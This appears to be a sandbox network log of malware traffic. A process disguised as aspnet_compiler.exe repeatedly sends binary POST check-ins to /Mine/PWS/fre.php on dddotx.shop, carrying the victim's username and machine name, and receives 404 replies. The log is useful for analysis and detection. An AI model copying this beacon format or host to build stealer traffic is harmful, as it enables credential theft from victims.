Sep 25, 2024 10:20:37.191843987 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hlH1SuVawJz9c0QLlwbrciqZo6hamSq1uBOUAvXoF%2B7wbikmWOkEc%2FlDb5oE8DEvnJUJ731SdQjaUq3OlHfThEkfGu35K831TW4f5Gwp59luQMlYJDMYRfs%2Beviy9w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899892a9ffc337-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.7	49803	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:37.342505932 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:37.347438097 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:38.011996984 CEST	601	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=utpWafjgdT33PSeJv9PBPTrO8ppnfQ%2FsHsbdj9MI9Gb4DltL8%2FXMZPpmzK2N2TS5elL8JJn2iCjP7e7iUvxRRhIR3%2BltLj83wE%2BJivLWUW2OHSEv%2BL71ZBJcFxqUHw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899897efd043f1-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.7	49804	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:38.165472984 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:38.170705080 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:38.830640078 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VNlHw6UCTZzfd0jbLW8bVW2x0RX5Cx%2B0NU9UWPL48iIwHSggQjv81Vg3VR6gRIaQHXdf04WCIoaQs43iPTgJnl2vi9qX0osuWCihXLevhda%2FqyPiqGuxD2aYTFDmvA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89989d0d0d42d7-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.7	49805	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:38.978502035 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:38.983344078 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:39.656409979 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P1502YAANubG45hwi3fZHV9Sh7MSxbejuV06sMcf7wg3Ue2%2BXUzes0yZVhibASG%2F3WvVV%2FHRZ0v8fwnkeBFLi00qG6pkV1HXtdLD9gYLUSWJtMGQYVJa5vZ8PXqxTw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998a22d374392-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.7	49806	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:39.807084084 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:39.812510014 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:40.523547888 CEST	601	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=93Oq53JWLIlwjNXlLWqb9uPPw%2B%2BWvdOUwDP1BB8zlaqyMm7SYK4Mpken6vWnuh0JPD8ic6B8TIpfXY37bZONk%2BF6c%2BVZpQgA0yx5lalTZFS%2FTkc5OhPyZ6zTltFXkA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998a74f9e42a5-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.7	49807	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:40.674865961 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:40.679656029 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:41.372648954 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z61VtDw2Wvo1l3YFqOShQowtO04M%2B8UPW0Y7dlzs6ktHdVaJhscCwFSkTLpCes12J4F2A0%2BtnWiZv6HEy53Vkrw0JXbeXPJst8StWUA8dSlpyErWyWOr%2F3T1ZW%2FhLQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998accb0e7d1c-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.7	49808	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:41.527319908 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:41.532088995 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:42.248594999 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hLIudn5PxlJJMKTx9fE7hd1p1HEnwTbKS4M5l%2FXRBLNr7iMGZCMOblWGCteP0VOYMCf9XMFuo7MG1t3%2BZDau0OZ2yruR9i0YCWSECcjeXOjXhCl%2BkRb3J8jSjxfjYQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998b228dd7281-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.7	49809	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:42.402154922 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:42.407099009 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:43.044941902 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZNSAGjfccAqxPfVdIS0Vv0aphrP%2BbIYycm6J1Ix1Honq2ztU4T%2BbNFc8iJcryd7FXZXFiaIMf4nuXKf%2B%2BEobSFOIkRFGUJvvghV7OnuSI7CZ4eAuq3b0dt3HNgO8yQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998b788687cff-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.7	49810	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:43.196113110 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:43.201045990 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:43.854548931 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XQKMpWg0eXPNmPQ0NtRTlXYGo8jh%2FHEeEtkG16temtj8S%2BBaLV%2FW7toPlydc51gUXAeN1mPeyFZSgsu7ODHZyWWg2xODuqJe2iz9uQ8R%2FraNu1EHICv59YZW2pwb5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998bc9d1742a5-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.7	49811	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:44.015618086 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:44.020697117 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:44.684386015 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R92%2FKfjNwZHmAHiJpqB5SJOV7DT62nePq26wPMXBDv6ukIgXiHcCLrrzD9w1bcFSL7XBQk22Vdp1ecpMMwRcyFhDNlzAsiaDfOVYqkrLEAnk%2BEg%2BsYYdQ5910zfSbA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998c1b8f25e78-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.7	49812	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:44.838891029 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:44.843940020 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:45.502173901 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o5L8WORFOBBkAkjRTHmov8FdEyO3vV5CB7RZZV9vUjkzWdb8VYK9hhWHqd2%2Fbz08EGvvXn1CTxD20q20F4aexqkkQnYcf8pok4oOz9X6%2Be7nH4YKz3BLctRJkwlhGg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998c6de9a8c12-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.7	49813	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:45.762470007 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:45.767834902 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:46.424729109 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vpLViIHoc53tjJCFDg%2BGODomOLKqGBRp51ZuKPmpF4KkVC7NLhWceZ9ufQgTZc5g%2FSCB8NaDApGsTFavpJ%2BvItBoxS2bdN%2FSH4JNkbRuOpAltFgVb2NCq9bXkhi9LQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998cc6bdd8cbd-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.7	49814	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:46.577153921 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:46.581998110 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:47.221939087 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BFSXSNRJv3RBkcQT3HQ4NSLO7S7OIOS981Ef9C7rqEzf5Oci7RAohTjTHcFXOe4Zlhfq6kjEwSeZovga2rRAUovyDn5kgYKGKzxnaH%2BtWwOig%2FhCqS8JV3X66L%2BWNQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998d19be841d2-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.7	49815	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:47.379018068 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:47.383984089 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:48.049494982 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3blxiqZv7%2BHAjoBK8RwY0e2%2FzSvy7abL%2BIcd1talAjK23czk0g4mYtOhzK%2Bh%2FUcYBTXIStrFXbdPtosp4XM63vmhTceVdmm5LS00%2BfaLsjDObBkOmIX89j1wDUiEhQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998d69fef5e5f-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.7	49816	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:48.340497017 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:48.345315933 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:49.020461082 CEST	563	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TXG7r5L21clLv5eWf95MLCFwYSMotEARVK%2FaP1YQNYWXF2FoHoRYY0qhC6lkhFPflXLWG3kg0eluETGYMPL1FhDRBSErm4Ni4fjZTUjoRDwUk6AozwBbPAj4l4xPvQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998dcaddfc324-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.7	49817	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:49.171890020 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:49.177011013 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
